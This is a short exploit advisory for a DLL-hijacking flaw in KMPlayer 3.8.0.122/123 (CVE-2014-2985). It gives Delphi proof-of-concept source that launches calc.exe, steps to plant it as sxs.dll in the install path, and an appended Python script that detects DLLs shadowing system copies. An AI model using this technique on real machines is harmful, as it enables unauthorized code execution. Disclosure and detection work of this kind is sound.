Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking

2014.04.29
Risk: Low
Local: Yes
Remote: No
CWE: N/A

# Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking #
###########################
#
# Exploit Title: [KmPlayer 3.8.0.123 DLL Hijacking]
# Date: [2014/04/22]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin: https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.kmplayer.com/]
# Software Link: [http://www.softpedia.com/progDownload/KMPlayer-Download-26726.html]
# Version: [Version 3.8.0.122 and 3.8.0.123]
# Tested on: [Windows XP SP3 - 32bit & Windows 7 - 32bit & 64bit]
# CVE: [CVE-2014-2985]
#
###########################

Details:

Untrusted search path vulnerability in KMPlayer, latest version [3.8.0.123], when running on Windows 7 and XP, allows local users and possibly remote attackers to gain privileges via a Trojan horse sxs.dll in the current working directory.

    uses
      Windows;
    begin
      WinExec(PAnsiChar('C:\WINDOWS\system32\calc.exe'), SW_SHOW);
    end.

Compile the above source code with Delphi, rename the compiled DLL to sxs.dll, then copy it to the KMPlayer installation path. When KMPlayer is run, the DLL is hijacked.
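A defensive check for the condition described above, as an added example that is not part of the original advisory: it lists DLLs in an application directory whose names also exist in the system directory (as sxs.dll does) and reports whether their content differs from the system copy. The function names and the temporary directory layout in `demo()` are assumptions constructed for illustration, not a real KMPlayer install.

```python
import hashlib
import tempfile
from pathlib import Path


def _sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Return DLLs in app_dir whose name also exists in system_dir.

    Windows file names are case-insensitive, so names are compared lower-cased.
    Each finding records whether the content differs from the system copy.
    """
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.is_file() and p.suffix.lower() == ".dll"}
    findings = []
    for p in sorted(Path(app_dir).iterdir()):
        if not p.is_file() or p.suffix.lower() != ".dll":
            continue
        match = system.get(p.name.lower())
        if match is not None:
            findings.append({
                "name": p.name,
                "path": str(p),
                "differs_from_system": _sha256(p) != _sha256(match),
            })
    return findings


def demo():
    """Constructed layout: stand-in directories with placeholder file contents."""
    with tempfile.TemporaryDirectory() as root:
        app = Path(root, "KMPlayer")
        sysdir = Path(root, "System32")
        app.mkdir()
        sysdir.mkdir()
        (sysdir / "sxs.dll").write_bytes(b"constructed system copy")
        (sysdir / "kernel32.dll").write_bytes(b"constructed system copy")
        (app / "SXS.DLL").write_bytes(b"constructed copy in app directory")
        (app / "codec.dll").write_bytes(b"constructed app library")
        return [(f["name"], f["differs_from_system"])
                for f in find_shadowing_dlls(app, sysdir)]


if __name__ == "__main__":
    for name, differs in demo():
        print(f"{name}: shadows a system DLL, differs={differs}")
```

On a real host, pass the application's install directory and `%SystemRoot%\System32`; a hit is a lead for signature and provenance review, since some applications legitimately ship private copies of DLLs.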

